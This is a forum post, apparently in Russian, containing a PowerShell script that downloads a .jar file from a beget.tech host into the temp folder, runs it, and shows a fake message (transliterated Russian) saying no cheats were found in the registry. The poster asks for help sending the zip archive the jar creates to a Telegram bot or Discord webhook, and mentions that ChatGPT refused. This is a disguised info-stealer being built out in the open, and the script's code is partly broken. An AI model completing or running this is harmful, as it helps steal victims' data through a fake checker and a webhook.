$url = "http://g99999cg.beget.tech/prov2.jar"
$outputFile = Join-Path $env:TEMP "prov2.jar"
Invoke-WebRequest -Uri $url -OutFile $outputFile
try {
Start-Process -FilePath $outputFile -Wait
1..5 | ForEach-Object {
# Замените 'your-webhook-url' на URL вашего webhook
Invoke-RestMethod -Uri 'your-webhook-url' -Method Post -Body @{
'content' = "4iti ne obnaruzeni v peremennoy sredi regedit"
}
Write-Output "4iti ne obnaruzeni v peremennoy sredi regedit"
}
} catch {
1..3 | ForEach-Object {
Write-Output "Oshibka, vozmozno vinovat antivirus libo nizkaya skorost interneta."
}
Write-Output "DLYA VIXODA NAZMITE ENTER"
Read-Host
Remove-Item $outputFile -Force
try {
1..5 | ForEach-Object {
}
} catch {
1..3 | ForEach-Object {
}
Read-Host
Remove-Item $outputFile -Force
у меня есть скрипт для повершел который скачивает и запускат джар файл, а джар файл создает зип архив в папке %temp% (если что название каждый раз отличается)
кто шарит в этом можете дописать скрипт чтобы перед тем как писать "4iti ne obnaruzeni v peremennoy sredi regedit" он отправлял его в тг бота или в дс сервер по вебхуку? чат жпт отказывается это писать =(
заранее спасибо